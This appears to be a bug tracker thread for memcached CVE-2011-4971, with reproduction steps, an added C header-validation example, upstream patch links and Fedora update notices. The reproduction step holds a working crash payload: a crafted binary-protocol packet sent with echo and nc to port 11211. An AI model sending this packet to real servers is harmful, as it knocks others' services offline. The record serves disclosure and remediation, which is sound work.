This was originally reported by Stefan Bucur:

1. Start memcached in TCP mode. For example:

   $ ./memcached -v -p 11211 -U 0

2. Send the specially crafted packet to it:

   $ echo -en '\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x01\x00\x00\x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' | nc localhost 11211

====

There is a patch mentioned in the original issue report, but the code has changed significantly since then.

External References:

https://code.google.com/p/memcached/issues/detail?id=192
http://insecurety.net/?p=872
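Added example (not part of the report, memcached's source, or the upstream patch): the first 24 bytes of the packet above form a memcached binary-protocol request header whose total body length field is 0xffffffe8, and the sketch below decodes that header and rejects inconsistent length fields before they are used. The names `mc_check_header`, `mc_req_hdr` and the `MC_MAX_BODY` limit are assumptions chosen for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define MC_HDR_LEN   24                      /* fixed binary-protocol header size */
#define MC_MAGIC_REQ 0x80                    /* request magic byte */
#define MC_MAX_BODY  (1024u * 1024u + 512u)  /* assumed cap: ~1 MiB item plus key/extras */

enum mc_verdict { MC_OK, MC_SHORT, MC_BAD_MAGIC, MC_BODY_TOO_SMALL, MC_BODY_TOO_LARGE };

struct mc_req_hdr {
    uint8_t  opcode, extlen;
    uint16_t keylen;
    uint32_t bodylen;   /* kept unsigned so a huge value never turns negative */
};

/* Decode the big-endian length fields and validate them before any
 * arithmetic, allocation or read size is derived from them. */
enum mc_verdict mc_check_header(const uint8_t *p, size_t n, struct mc_req_hdr *h)
{
    if (n < MC_HDR_LEN) return MC_SHORT;
    if (p[0] != MC_MAGIC_REQ) return MC_BAD_MAGIC;
    h->opcode  = p[1];
    h->keylen  = (uint16_t)((p[2] << 8) | p[3]);
    h->extlen  = p[4];
    h->bodylen = ((uint32_t)p[8] << 24) | ((uint32_t)p[9] << 16) |
                 ((uint32_t)p[10] << 8) | (uint32_t)p[11];
    /* The body must be able to hold the extras and the key. */
    if (h->bodylen < (uint32_t)h->keylen + h->extlen) return MC_BODY_TOO_SMALL;
    if (h->bodylen > MC_MAX_BODY) return MC_BODY_TOO_LARGE;
    return MC_OK;
}

/* Header bytes copied from the packet quoted in the report. */
static const uint8_t reported_hdr[MC_HDR_LEN] = {
    0x80, 0x12, 0x00, 0x01, 0x08, 0x00, 0x00, 0x00,
    0xff, 0xff, 0xff, 0xe8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
};

int main(void)
{
    struct mc_req_hdr h;
    enum mc_verdict v = mc_check_header(reported_hdr, sizeof reported_hdr, &h);
    printf("opcode=0x%02x keylen=%u extlen=%u bodylen=%u (as int32: %d) verdict=%d\n",
           (unsigned)h.opcode, (unsigned)h.keylen, (unsigned)h.extlen,
           (unsigned)h.bodylen, (int)(int32_t)h.bodylen, (int)v);
    return v == MC_BODY_TOO_LARGE ? 0 : 1;
}
```

Read as a signed 32-bit integer, the same field is -24, which is why the check compares the value as unsigned against an explicit upper bound.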
Created memcached tracking bugs for this issue
Affects: fedora-all [bug 957966]

Created memcached tracking bugs for this issue
Affects: epel-5 [bug 957967]

Created memcached tracking bugs for this issue
Affects: epel-6 [bug 957969]
Proposed upstream patch (with a test): https://code.google.com/p/memcached/issues/detail?id=192#c19
It seems upstream has finally accepted the patch and it's in the recently released 1.4.16. Thanks! https://github.com/memcached/memcached/commit/6695ccbc525c36d693aaa3e8337b36aa0c784424
memcached-1.4.17-1.fc20 has been pushed to the Fedora 20 stable repository. If problems still persist, please make note of it in this bug report.
memcached-1.4.17-1.fc19 has been pushed to the Fedora 19 stable repository. If problems still persist, please make note of it in this bug report.
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s): https://access.redhat.com/security/cve/cve-2011-4971